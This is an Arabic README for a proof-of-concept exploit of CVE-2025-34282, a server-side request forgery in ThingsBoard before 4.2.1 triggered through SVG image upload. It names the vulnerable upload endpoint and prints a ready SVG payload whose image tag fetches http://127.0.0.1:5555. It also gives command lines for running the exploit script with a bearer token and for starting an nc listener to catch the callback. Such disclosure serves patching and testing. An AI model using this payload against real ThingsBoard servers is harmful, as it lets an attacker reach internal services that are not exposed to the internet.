
استغلال إثبات المفهوم لـ CVE-2025-34282 - تزوير طلبات الخادم (SSRF) في ThingsBoard عبر رفع صور SVG
ثغرة تزييف الطلب من جانب الخادم (SSRF) في منصة ThingsBoard للإصدارات قبل 4.2.1.
يمكن للمهاجم الذي لديه صلاحيات مسؤول المستأجر تحميل ملف SVG مُعدّ خصيصاً يحتوي على مرجع داخلي URL من خلال معرض تحميل الصور. عندما يقوم ThingsBoard بمعالجة SVG من جانب الخادم، فإنه يجلب الـ URL المشار إليه — مما يسمح بالوصول إلى الخدمات الداخلية غير المكشوفة للإنترنت.
| الحقل | التفاصيل |
|---|
| CVE | CVE-2025-34282 |
| الإصدار المتأثر | < 4.2.1 |
| الإصدار المُصلح | 4.2.1 |
| درجة CVSS | 6.9 متوسط |
| CWE | CWE-918 (تزييف الطلب من جانب الخادم) |
| المورد | https://thingsboard.io |
POST /api/image
publicLink لـ SVG عبر وسم <object>
حمولة ssrf_localhost_5555.svg تحتوي على مرجع داخلي URL:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
عند التحميل، يقوم خادم ThingsBoard بجلب http://127.0.0.1:5555، مما يؤكد وجود SSRF.
المتطلبات:
pip install requests
التشغيل:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
مثال:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
ابدأ مستمعًا لالتقاط رد الاتصال الخاص بـ SSRF قبل تشغيل الاستغلال:
nc -l 5555
Tamil Mathi T.